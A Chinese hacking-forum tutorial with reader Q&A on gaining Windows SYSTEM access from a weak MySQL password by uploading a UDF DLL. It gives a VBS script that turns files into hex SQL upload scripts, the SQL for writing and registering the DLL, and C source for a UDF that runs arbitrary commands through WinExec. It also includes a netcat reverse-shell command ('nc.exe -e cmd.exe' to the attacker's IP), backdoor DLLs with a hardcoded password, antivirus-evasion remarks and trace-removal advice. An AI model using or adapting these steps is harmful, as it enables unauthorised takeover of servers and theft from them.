利用MYSQL提升权限

yanghongjun

　　早网上就有了用mysql弱口令得到webshell教程，但是这次我要说的不是得到webshell，而是直接得到系统权限，看清楚了，是“直接”得到！
　　首先，我简单说一下mysql弱口令得到系统权限得过程：首先利用mysql脚本上传udf dll文件，然后利用注册UDF DLL中自写的Function函数，而执行任意命令。
　　思路很简单，网上也有一些教程，但是他们要么没有给具体的代码，要么一句话代过，搞得象我似得小菜很难理解，终于在我付出了几天得不断测试得辛勤劳动后，有了点结果，我把详细过程和相关代码得交给大家，这样大家就可以自己写dll文件，自己生成不同文件得二进制码啦！
　　下面，我们先说如何生成二进制文件得上传脚本。看看这段mysql脚本代码（网友Mix用的方法）：
　　set @a = concat('',0x0123abc1312389…..);
　　set @a = concat(@a,0x4658978abc545e……);
　　………………….
　　create table Mix(data LONGBLOB);//建表Mix,字段为data，类型为longblob
　　insert into Mix values("");update Mix set data = @a;//@a插入表Mix
　　select data from Mix into DUMPFILE 'C:\\Winnt\\文件名';//导出表中内容为文件
　　前两句很熟悉把，这个就是我们以前注入的时候，绕过’的解决办法，把代码的16进制数声明给一个变量，然后导入这个变量就行了。只不过这里，因为16进制代码是一个文件的内容，代码太长了，所以就用了concat函数不断把上次得代码类加起来，这样不断累计到一个变量a中。后面几句就很简单了，我都有注释。
　　后面三句好说，但是前面的那么多16进制数据，手工的话，累人啊！不过你还记得以前有一个exe2bat.vbs脚本吗？这次我们可以把这个脚本修改一下后，得到我们这里需要得mysql脚本！对比exe2bat.vbs生成得文件和我们需要脚本的文件格式，我们可以轻松的得到我们所需的脚本。脚本内容如下：
　　fp=wscript.arguments(0
　　fn=right(fp,len(fp)-instrrev(fp,"\"))
　　with createobject("adodb.stream")
　　.type=1:.open:.loadfromfile fp:str=.read:sl=lenb(str)
　　end with
　　sll=sl mod 65536:slh=sl\65536
　　with createobject("scripting.filesystemobject").opentextfile(fp&".txt",2,true)
　　.write "set @a = concat('',0x"
　　for i=1 to sl
　　bt=ascb(midb(str,i,1))
　　if btmysql –u root –h hostip –p
　　Mysql>use mysql; //先进入mysql默认得数据库，否则你下一步的表将不知道属于哪个库
　　Mysql>\. E:\*.dll.txt; //这儿就是你生成的mysql脚本
　　按照上面输入命令，就可以看见屏幕文字飞快闪烁（当然网速要快啦），不一会你的文件旧上传完毕了！
　　下面到达我们的重点，我们上传什么dll文件？就目前我再网上看到的有两个已经写好的dll文件，一个是Mix写得mix.dll，一个是envymask写得my_udf.dll,这两个我都用过，都很不错，但是都也有点不足。先来看看具体的使用过程吧！
　　先用mix.dll:
　　登陆mysql,输入命令：
　　Mysql> \. e:\mix.dll.txt;
　　Mysql> Create FUNCTION Mixconnect RETURNS STRING SONAME 'C:\\windows\\mix.dll';
　　//这儿的注册的Mixconnect就是在我们dll文件中实现的函数，我们将要用他执行系统命令！
　　Mysql> select Mixconnect('你的ip','8080'); //填写你的反弹ip和端口
　　过一会儿，你监听8080端口的nc，就会得到一个系统权限的shell了！如图1：
　　这个的确不错，通过反弹得到得shell可以传过一些防火墙，可惜的是，它的这个函数没有写得很好，只能执行一次，当你第二次连接数据库后，再次运行“select Mixconnect('你的ip','8080');”的时候，对方的mysql会当掉！报错，然后服务停止！
　　所以，使用mix.dll你只有一次成功，没有再来一次的机会！另外根据我的测试，他对Win2003的系统好像不起作用。
　　再用my_udf.dll：
　　Mysql>\. C:\my_udf.dll.txt
　　Mysql> Create FUNCTION my_udfdoor RETURNS STRING SONAME 'C:\\winnt\\my_udf.dll';
　　//同样地，my_udfdoor也是我们注册后，用来执行系统命令得函数
　　Mysql> select my_udfdoor('’); //这儿可以随便写my_udfdoor得参数，相当于我们只是要激活这个函数
　　好了，现在你可以不用关这个shell了，我们再开一个cmd，使用：
　　D:\>nc hostip 3306
　　*
　　4.0.*-nt x$Eo~MCG f**k //看到这个后，输入“f**k” ,他是my_udfdoor默认密码，自己无法更改
　　过一会儿，你就有了系统权限的shell了，
　　由于他是hook recv版，所以穿墙的能力很强，我是在上一个mix.dll反弹失败的情况下，才使用这个得，他果然不负所望！进系统后，发现它有双网卡，天网防火墙个人版V2.73，对外仅仅开放3306端口，由此可见，my_udf.dll确实有很强的穿透防火墙得能力！但是他也有一个bug,就是再我们连接激活这个函数后（就是使用了命令“select my_udfdoor('’);”后），不管你是否连接，只要执行了:
　　Mysql>drop function my_udfdoor; 后，mysql也汇报错，然后挂掉，
　　所以，你使用这个dll文件无法删除你的痕迹！
　　最后，然我们自己写一个自定义的dll文件。看能不能解决问题。
　　我们仅仅使用mysql 得udf的示例作模版即可！看他的示例：
　　＃i nclude
　　＃i nclude
　　＃i nclude
　　extern "C" {
　　char *my_name(UDF_INIT *initid, UDF_ARGS *args, char *is_null,
　　char *error);
　　// 兼容C
　　}
　　char *my_name(UDF_INIT *initid, UDF_ARGS *args, char *is_null,
　　char *error)
　　{
　　char * me = "my name";
　　return me;
　　// 调用此UDF将返回 my name
　　}
　　十分简单吧？好，我们只需要稍微改一下就可以有了自己的dll文件了：
　　下面是我的一个哥们Crackme是修改的：
　　＃i nclude
　　＃i nclude
　　＃i nclude "mysql.h"
　　extern "C" __declspec(dllexport)char *sys_name(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error);// sys_name就是函数名，你可以任意修改
　　__declspec(dllexport) char *sys_name(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error) //当然这儿的sys_name也得改！
　　{
　　char me[256] = {0};
　　if (args->arg_count == 1){
　　strncpy(me,args->args[0],args->lengths[0]);
　　me[args->lengths[0]]='\0';
　　WinExec(me,SW_HIDE); //就是用它来执行任意命令
　　}else
　　strcpy(me,"do nonthing.\n");
　　return me;
　　}
　　好，我们编译成sysudf.dll文件就可以了！我们来用他实验一把！
　　看操作：
　　Mysql>\. C:\sysudf.dll.txt
　　Mysql>Create function sys_name returns string soname 'C:\\windows\\sysudf.dll';
　　Mysql>\. Nc.exe.txt //把nc.exe也上传上去
　　Mysql>select sys_name('nc.exe -e cmd.exe 我的ip 8080');
　　//sys_name参数只有一个，参数指定要执行的系统命令
　　好，看看在Win2003中的一个反弹shell了，
　　当然，我们你也可以不反弹shell了，而去执行其他命令，只不过不论是否执行成功，都没有回显，所以要保证命令格式正确。对于这个dll文件，经过测试，不论何时“drop function sys_name;”，都是不会报错的，同时也可以多次运行不同命令。至于他的缺点，就是他的穿墙能力跟Mix.dll一样不算太强，但对于实在穿不透的墙，直接运行其他命令就是最好的选择了。
　　上面三个dll文件可谓各有所短，如何选择，就看你遇到的实际情况了。
　　一、功能：利用MYSQL的自定义函数功能（再次声明：利用MYSQL UDF提权绝非是溢出，而是MYSQL本身的一个功能），将MYSQL账号转化为系统system权限。
　　二、适用场合：1.目标系统是Windows(Win2000,XP,Win2003)；2.你已经拥有MYSQL的某个用户账号，此账号必须有对mysql的insert和delete权限以创建和抛弃函数(MYSQL文档原语)。
　　三、使用帮助：
　　第一步：将PHP文件上传到目标机上，填入你的MYSQL账号经行连接。
　　第二步：连接成功后，导出DLL文件，导出时请勿必注意导出路径（一般情况下对任何目录可写，无需考虑权限问题），对于MYSQL5.0以上版本，你必须将DLL导出到目标机器的系统目录(win 或 system32)，否则在下一步操作中你会看到”No paths allowed for shared library”错误。
　　第三步：使用SQL语句创建功能函数。语法：Create Function 函数名（函数名只能为下面列表中的其中之一） returns string soname '导出的DLL路径'；对于MYSQL5.0以上版本，语句中的DLL不允许带全路径，如果你在第二步中已将DLL导出到系统目录，那么你就可以省略路径而使命令正常执行，否则你将会看到”Can't open shared library”错误，这时你必须将DLL重新导出到系统目录。
　　第四步：正确创建功能函数后，你就可以用SQL语句来使用这些功能了。语法：select 创建的函数名('参数列表')； 每个函数有不同的参数，你可以使用select 创建的函数名('help')；来获得指定函数的参数列表信息。
　　第五步：使用完成后你可能需要删除在第二步中导出的DLL，但在删除DLL前请先删除你在第三步中创建的函数，否则删除操作将失败，删除第三步中创建的函数的SQL语句为：drop function 创建的函数名。
　　图5
　　四、功能函数说明：
　　cmdshell 执行cmd;
　　downloader 下载者,到网上下载指定文件并保存到指定目录;
　　open3389 通用开3389终端服务,可指定端口(不改端口无需重启);
　　backshell 反弹Shell;
　　ProcessView 枚举系统进程;
　　KillProcess 终止指定进程;
　　regread 读注册表;
　　regwrite 写注册表;
　　shut 关机,注销,重启;
　　about 说明与帮助函数;
　　——————————————————–
　　引用第13楼编程king于2006-10-25 02:01发表的:
　　看了楼主的文章后，我拿了台服务器来做实验，mysql的权限是root用户连接的，mysql的版本是5.0的，那就是要说把udf.dll导出到系统目录下了，因为mysql是5.0版的，第一步要：c:\windows\udf.dll或者c:\windows\system32\udf.ll这样哪？再或者c:\windows、c:\windows\system32 ，我这样尝试的时候是都成功了，但是到了第二步，却出现搂主说的No paths allowed for shared library，再导出到系统目录里的时候已经错误了，本身已经有过了，我又尝试把udf.dll改成别的dll文件，还是不行，这里我就不明白了，
　　windows和system32的目录下都有udf.dll这个文件，为什么还是错误？是因为第一次导出的时候错误了？还是格式不对？或者是我人品有问题？等待楼主的解答。。。。。
　　哈哈，可能我写的不足够明白：“如果你在第二步中已将DLL导出到系统目录，那么你就可以省略路径而使命令正常执行”
　　你只要导出一次，比如你已经导到了c:\windows目录。你就可以执行Create function cmdshell returns string soname 'udf.dll';
　　后面的DLL就不用带路径了，导到系统目录就是会了可以让程序不带路径就能找到udf.dll。
　　QUOTE:
　　我执行了：Create Function returns string soname 'udf.dll'时 数据库查讯出错，请检查SQL语句Create Function returns string soname 'udf.dll'的语法是否正确。You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'string soname 'udf.dll'' at line 1
　　兄弟忘了写函数名:你可以试试:Create Function cmdshell returns string soname 'udf.dll';
　　QUOTE:
　　３３８９　开不了 select open3389('3389') 语法没错吧！ 顺求 其他函数的使用方法！
　　程序中用到了一个通用开3389程序组件，而这个程序是我从网上下载的，再做了一下免杀处理而已，对这个开3389程序本身我也不是很清楚，不过我试了好几个版本的虚拟机，觉得成功率是我能下到的此类程序中最好的，就把它作为一个资源导入到了我的DLL中，对你这个问题我也不知道什么原因，如果朋友有更好的开3389程序，我可以改进一下。
　　QUOTE:
　　测试时发生下面错误! Fatal error: Maximum execution time of 30 seconds exceeded in C:AppServwwwudf.php on line 91
　　排除服务器的性能问题外，可能是服务器上杀毒软件的原因。